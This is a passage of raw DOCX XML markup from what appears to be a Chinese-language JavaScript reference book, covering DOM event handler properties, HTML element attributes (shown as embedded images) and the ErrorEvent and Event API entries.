        <w:t>对象定义相当多的事件处理程序属性。将下面列出的任意一个属性设置为一个函数，那个函数就会在该对象上发生（或冒泡到）特定事件时被调用。当然，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>EventTarget</w:t>
      </w:r>
      <w:r>
        <w:t>定义的方法来注册事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数事件从文档层次结构冒泡到</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>节点，然后从那儿再到</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。所以，这儿列出的每个事件处理程序属性在</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上也有定义。</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象有不少专有的事件处理程序，下面表格中标有星号的属性在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上有不同的含义。由于历史原因，作为＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性注册的事件处理程序</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>会注册在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上，这意味着带星号的事件处理程序属性注册在＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上时会和它们注册在其他元素上时的含义不同。参见</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿列出的大多数事件只会在特定类型的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上触发，不过由于这些事件大多会在文档树中向上冒泡，因此这些事件处理程序属性一般是为所有元素定义的。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞上触发的媒体事件不会冒泡，所以它们在</w:t>
      </w:r>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
      <w:r>
        <w:t>条目中归档。类似地，一些与</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>表单相关的事件也不会冒泡，这些事件包含在</w:t>
      </w:r>
      <w:r>
        <w:t>For</w:t>
      </w:r>
      <w:r>
        <w:t>mControl</w:t>
      </w:r>
      <w:r>
        <w:t>条目中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251755520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4050101" cy="2053086"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="100" name="00100.jpeg" descr="00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0.jpeg" descr="00100.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4050101" cy="2053086"/>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56544" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4114800" cy="4175184"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="101" name="00101.jpeg" descr="00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1.jpeg" descr="00101.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4114800" cy="4175184"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素及属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这一部分包括下面的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素类型的独立参考页面：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251757568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4127739" cy="1397479"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="102" name="00102.jpeg" descr="00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2.jpeg" descr="00102.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4127739" cy="1397479"/>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58592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4166558" cy="1436298"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="103" name="00103.jpeg" descr="00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3.jpeg" descr="00103.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4166558" cy="1436298"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>那些所有属性</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>都是其</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的简单映射的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素没有单独的参考页面，下面这些属性是所有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素都有的合法属性，因此它们也是所有</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251759616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4149305" cy="2976113"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="104" name="00104.jpeg" descr="00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4.jpeg" descr="00104.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId107"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4149305" cy="2976113"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素只定义上面这些公共属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251760640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3920705" cy="970471"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="105" name="00105.jpeg" descr="00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5.jpeg" descr="00105.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3920705" cy="970471"/>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61664" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3605841" cy="892833"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="106" name="00106.jpeg" descr="00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6.jpeg" descr="00106.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3605841" cy="892833"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>剩下的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素以及它们支持的属性见下面的表格。注意，这个表格只列出了除上面的公共属性外的属性，同时别忘了这个表格也包括那些有自己的参考页面的元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251762688" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4166558" cy="4330460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="107" name="00107.jpeg" descr="00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7.jpeg" descr="00107.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4166558" cy="4330460"/>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63712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4149305" cy="5934973"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="108" name="00108.jpeg" descr="00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8.jpeg" descr="00108.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId111"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4149305" cy="5934973"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="816" w:name="ErrorEvent"/>
      <w:r>
        <w:t>ErrorEvent</w:t>
      </w:r>
      <w:bookmarkEnd w:id="816"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>某个工作线程未捕获的异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当一个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中发生一个未捕获的异常，并且这个异常在</w:t>
      </w:r>
      <w:r>
        <w:t>WorkerGlobalScope</w:t>
      </w:r>
      <w:r>
        <w:t>中没有被对应</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>函数处理时，这个异常就会在这个</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发一个不冒泡的错误事件。这个事件有一个关联的</w:t>
      </w:r>
      <w:r>
        <w:t>ErrorEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象，提供了刚刚发生的异常的详情。在</w:t>
      </w:r>
      <w:r>
        <w:t>ErrorEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用</w:t>
      </w:r>
      <w:r>
        <w:t>preventDefault()</w:t>
      </w:r>
      <w:r>
        <w:t>（或从事件处理程序上返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>）将阻止错误向包含的线程进一步传播，也可能会阻止它在错误控制台显示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reado</w:t>
      </w:r>
      <w:r>
        <w:t>nly string flename</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最初抛出异常的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly unsigned long lineno</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文件中抛出异常的行号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述该异常的消息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="817" w:name="Event"/>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:bookmarkEnd w:id="817"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>标准事件、</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>事件以及</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件的细节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当事件处理程序被调用时，一个</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象会传入，该对象的属性给出事件的细节，比如事件的类型以及发生事件的元素。</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法可以控制事件的传播。所有现代浏览器都实现了一个标准事件模型，除了</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早的版本定义了不兼容的专有事件模型。本页归档标准事件模型的属性和方法以及对应的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>方案，也包括</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象，后者在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>上模拟一个标准的事件对象。关于事件的更多信息请参考第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章，关于</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件的更多信息请参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在标准事件模型中，不同种类的事件有与其相关联的不同的事件对象：比</w:t>
      </w:r>
      <w:r>
        <w:t>如，鼠标事件有一个具有鼠标相关属性的</w:t>
      </w:r>
      <w:r>
        <w:t>MouseEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象，键盘事件有一个具有键盘相关属性的</w:t>
      </w:r>
      <w:r>
        <w:t>KeyEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>MouseEvent</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>KeyEvent</w:t>
      </w:r>
      <w:r>
        <w:t>共享一个通用的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>超类。不过，在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件模型中，</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象上发生的所有事件都只使用一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在一个鼠标事件中，</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的与键盘事件相关的属性是没有意义的，但这些属性仍然会定义。为简单起见，这儿合并了事件层次结构，对所有可被分发到</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象（然后冒泡到</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象）的事件属性编写</w:t>
      </w:r>
      <w:r>
        <w:t>了文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>本来，几乎所有客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>事件都是在文档元素上触发的，也很自然地应该把文档相关的事件对象的属性合并在一起。不过</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>及相关的标准引入了一些新的事件类型，这些事件在非文档元素上触发。这些事件类型经常具有自己的</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>类型，这些类型在它们自己的参考页面有介绍。参见</w:t>
      </w:r>
      <w:r>
        <w:t>BeforeUnloadEvent</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CloseEvent</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>ErrorEvent</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>HashChangeEvent</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>MessageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>PageTransitionEvent</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>PopStateEvent</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Progress</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>StorageEvent</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些事件对象类型中的大多数都扩展了</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
